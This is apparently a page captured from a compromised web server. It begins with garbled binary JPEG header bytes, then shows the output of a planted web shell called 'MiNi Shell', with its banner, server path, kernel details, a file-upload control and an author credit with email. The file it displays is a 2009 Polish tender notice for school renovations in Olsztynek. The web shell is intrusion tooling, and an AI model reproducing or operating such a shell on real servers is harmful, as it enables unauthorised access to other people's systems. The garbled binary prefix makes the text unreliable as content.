JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090514/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090514/148752-N-2009.html

<p class="kh_header"><b>Olsztynek: Remonty budynków placówek oświatowych w okresie ferii letnich 2009 r.</b><br>
<b>Numer ogłoszenia: 148752 - 2009; data zamieszczenia: 14.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Administracji Szkół i Przedszkoli w Olsztynku , ul. Górna 5, 11-015 Olsztynek, woj. warmińsko-mazurskie, tel. 089 5192506, faks 089 5194468.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty budynków placówek oświatowych w okresie ferii letnich 2009 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
gruntowny remont zaplecza higieniczno - sanitarnego sali gimnastycznej, wykonanie robót malarskich, naprawa parkietów i montaż parapetów wewnętrznych, wymiana komina spalinowego, rynien i rur spustowych oraz gruntowny remont lokalu mieszkalnego w budynku szkolnym..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawcy ubiegający się o zamówienie publiczne muszą:           
a)	spełniać warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz nie   podlegać wykluczeniu na podstawie art. 24 tej ustawy.
b)	udzielić gwarancji na wykonane roboty budowlane na okres minimum 2 lat, licząc od dnia odbioru tych robót..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu, Wykonawca składa    następujące dokumenty:
1)  formularz ofertowy z wykorzystaniem wzoru - Załącznik Nr 2 do SIWZ, wraz z kosztorysem ofertowym,
2) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
3) oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych- wg wzoru stanowiącego Załącznik Nr 3 do SIWZ.
4) oświadczenie o udzieleniu gwarancji na wykonane roboty budowlane na okres 2 lat- wg wzoru własnego. 
5) oświadczenie Wykonawcy że nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie społeczne i zdrowotne (wg wzoru własnego) , lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6) zaakceptowany projekt umowy, parafowany na każdej zapisanej stronie przez osobę podpisującą   ofertę - wg Załącznika Nr 4 do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.olsztynek.pl/ogloszenia_f.html.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Administracji Szkół i Przedszkoli w Olsztynku 
ul. Górna 5, 11-015 Olsztynek, pokój nr 2 w godzinach 8;00 - 15;00
lub faxem na wniosek Wykonawcy.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2009 godzina 10:00, miejsce: Zespół Administracji Szkół i Przedszkoli w Olsztynku 
ul. Górna 5, 11-015 Olsztynek, pokój nr 4.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont budynku Szkoły Podstawowej w Olsztynku ul. Ostródzka 2..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uwaga: kompleks budynków oddano do użytku 1 września 1974  roku  jako Zbiorczą Szkołę Gminną (ponad 800 uczniów). Przez 35 lat na zapleczu sali gimnastycznej przeprowadzano jedynie remonty zachowawcze i konserwacje bieżące.                                                                           
Będący przedmiotem zamówienia - gruntowny remont zaplecza higieniczno-sanitarnego (blok dla dziewcząt) sali gimnastycznej - obejmuje: roboty rozbiórkowe (wyburzenie starych, zbędnych ścian działowych), roboty murowe (postawienie nowych ścianek działowych, kominów wentylacyjnych itd.), wymianę stolarki drzwiowej, roboty posadzkarskie (ułożenie płytek typu gres) i położenie glazury na ścianach,  roboty malarskie (malowanie farbami olejnymi i emulsyjnymi, po uprzednim wykonaniu tynków - gładzi szpachlowych), roboty elektryczne (wykonanie całości nowej instalacji elektrycznej), roboty hydrauliczno- sanitarne (wymianę całej instalacji zimnej i ciepłej wody oraz kanalizacyjnej, wymianę instalacji centralnego ogrzewania, a także montaż elektrycznego podgrzewacza wody)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont budynku dydaktycznego Zespołu Szkolno-Przedszkolnego w Waplewie, Waplewo 15..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uwaga: kompleks budynków oddany do użytku w 1995 roku. 
Od bieżącego roku rozpoczyna się gruntowne odnawianie izb lekcyjnych, pomieszczeń pomocniczych, korytarzy i klatek schodowych tej placówki. W poprzednich latach odnowiono całość lamperii olejnych w izbach lekcyjnych i wykonywano malowanie emulsyjne części pomieszczeń. 
Przedmiotem zamówienia jest kompleksowe malowanie ścian i sufitów oraz malowanie olejne lamperii: wejścia - przedsionka budynku dydaktycznego, korytarzy parteru i I piętra, klatek schodowych oraz 2 izb lekcyjnych nr 21 i 24. Roboty malarskie obejmują również malowanie stolarki okiennej i drzwiowej, grzejników c.o. i rur wodociągowych. Ponadto w zakresie zamówienia znajduje się rozbiórka istniejących murowanych ścianek działowych w izbie lekcyjnej i wykonanie innego podziału tej izby ścianką z płyt gipsowo - kartonowych..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remont budynku Przedszkola Miejskiego w Olsztynku ul. Szkolna 9..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uwaga: budynek oddany do użytku w 1993 roku. 
Inwestycję zrealizowano w latach 1989 - 1993 (z przerwą) wg typowego projektu powtarzalnego. W roku 1999 wykonano cyklinowanie i lakierowanie podłóg sal zajęciowych i korytarzy. W II połowie 2008 roku obiekt gruntownie wyremontowano w ramach termomodernizacji. Będący przedmiotem zamówienia remont posadzek itd. sprowadza się do uzupełnienia brakujących fragmentów mozaiki parkietowej pod oknami (przed termomodernizacją były tam zawieszone grzejniki rurowe, zakryte osłonami z drewna), następnie bezpyłowe ocyklinowanie całej powierzchni podłóg 5 sal zajęciowych i 3-krotne lakierowanie. Zadanie obejmuje również osadzenie parapetów wewnętrznych w oknach 5 sal zajęciowych (łącznie 20 okien). Jest to związane z likwidacją dotychczas istniejących drewnianych osłon grzejników c.o. Po termomodernizacji w każdej sali tylko pod 2 oknami zawieszone są grzejniki -Purmo- (nie wymagające osłon)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Remont starej części budynku Gimnazjum w Olsztynku ul. Górna 5..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uwaga: budynek powstał w 1934 roku. 
W roku 1993 zamieniono piece węglowe na 2 kotły opalane gazem ziemnym. Komin spalinowy usytuowano na zewnątrz budynku, przy południowo - wschodniej ścianie szczytowej, wykonując go z blachy ocynkowanej i wełny mineralnej. Względy estetyczne oraz zużycie po 16-letniej eksploatacji nakazują likwidację przedmiotowego komina. 
Istniejący komin murowany budynku posiada m.in. 2 kanały 35 x 35 cm. Jeden z nich może być wykorzystany do zamontowania rur dymowych kwasoodpornych O 25 cm. W zakres zamówienia w tej części wchodzi także wymiana rynien i rur spustowych na budynku dydaktycznym (bez sali gimnastycznej i łącznika). Ostatni remont w tym zakresie był przeprowadzony w roku 1982..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Remont budynku Szkoły Filialnej w Królikowie, Królikowo 24..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uwaga: budynek pochodzi z 1902 roku.
Przedmiotem zamówienia jest gruntowny remont lokalu mieszkalnego usytuowanego na parterze budynku szkolnego, w zakresie obciążającego wynajmującego - administratora tj. Zespół Administracji Szkół i Przedszkoli w Olsztynku. Najemca (nauczyciel - emeryt) aktualnie nie mieszka w lokalu. Uczyni to dopiero po zakończeniu przedmiotowego remontu i wykonaniu robót obciążających najemcę..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com